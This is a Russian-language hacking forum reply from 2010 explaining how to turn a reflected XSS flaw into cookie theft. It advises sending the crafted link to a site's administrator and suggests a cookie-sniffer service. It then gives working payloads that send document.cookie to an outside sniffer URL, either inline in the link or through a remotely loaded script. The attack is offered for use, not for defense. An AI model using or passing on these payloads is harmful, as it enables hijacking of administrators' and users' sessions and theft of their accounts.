11.07.2010, 22:34
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от Boa
Boa said:
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше?
Если на сайте с авторизацией, то сунуть админу, если нет - забить.
Сообщение от Boa
Boa said:
Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером?
Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/
Сообщение от Boa
Boa said:
Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html
- это читал, но не нашел (или не понял) ответа(( Почитай еще, там есть ответ на твой последний вопрос..
Сообщение от None
###Как его подставить к ссылке с Xss?
Да очень легко...
Есть несколко вариантов:
- 1)делаем вот так:
http://*****.ru/free?p='>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;
где **** сайт с Xss.
Вот сам составленый скрипт:
'>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
- 2)Можно ещё делать вот так:
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.
|
|
|